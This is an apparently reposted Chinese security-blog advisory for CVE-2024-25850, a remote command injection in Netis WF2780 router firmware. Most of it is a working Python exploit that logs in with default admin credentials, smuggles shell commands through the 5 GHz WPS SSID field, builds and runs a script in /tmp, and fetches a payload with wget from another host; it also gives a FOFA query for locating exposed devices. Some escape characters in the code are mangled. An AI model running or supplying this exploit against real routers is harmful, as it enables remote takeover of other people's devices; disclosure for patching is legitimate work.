CVE-2024-25850

admin 2024年4月11日15:15:04评论49 views字数 1707阅读5分41秒阅读模式

使

01

漏洞名称

Netis WF2780 远程命令执行漏洞

02

漏洞影响

Netis WF2780 v2.1.40144版本

https://www.netis-systems.com/Suppory/de_details/id/1/de/189.html

03

漏洞描述

Netis是一家专门从事网络通信设备的制造商。他们提供各种网络设备,包括路由器、交换机、无线接入点和网络适配器等。Netis WF2780 v2.1.40144版本在bin/cgitest.cgi文件的函数igd_wps_set中有一个远程命令注入漏洞。会导致被远控。

04

FOFA搜索语句
title='AP setup' && header='netis'

CVE-2024-25850

05

poc

python poc文件内容如下

#!/usr/bin/env python3import urllib.parseimport socket def send_cmd(ip, port, cmd):    cmd = "";"+cmd+";""    #print(f"cmd:{cmd}")    body = "wps_set_5g=ap&wps_mode5g=cpin&wps_ap_ssid5g=" + urllib.parse.quote(cmd)    request = "POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1rn"    request += f"Host: {ip}rn"    request += "Content-Length: {}rn".format(len(body))    request += "Authorization: Basic YWRtaW46YWRtaW4=rn"    request += "Cache-Control: no-cachern"    request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36rn"    request += "content-type: application/x-www-form-urlencodedrn"    request += f"Origin: http://{ip}rn"    request += f"Referer: http://{ip}/index.htmrn"    request += "Accept-Encoding: gzip, deflatern"    request += "Accept-Language: zh-CN,zh;q=0.9rn"    request += "Connection: closernrn"    request += body    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    c.settimeout(8)    c.connect((ip,port))    c.send(request.encode())    c.recv(1024)    #print(c.recv(1024))def main(ip, port, cmd):    for i in range(len(cmd)):        if i == 0:            _cmd = f"echo '{cmd[i]}\c' > /tmp/s.sh"        else:            _cmd = f"echo '{cmd[i]}\c' >> /tmp/s.sh"        send_cmd(ip, port, _cmd)    send_cmd(ip, port, "chmod 777 /tmp/s.sh")    send_cmd(ip, port, "sh /tmp/s.sh")if __name__ == "__main__":    main("192.168.1.1", 80, "cd /tmp;wget http://192.168.1.2:8888/a")    #main("192.168.1.1", 80, "reboot")

CVE-2024-25850

06

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-25850

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月11日15:15:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-25850https://cn-sec.com/archives/2647495.html

发表评论

匿名网友 填写信息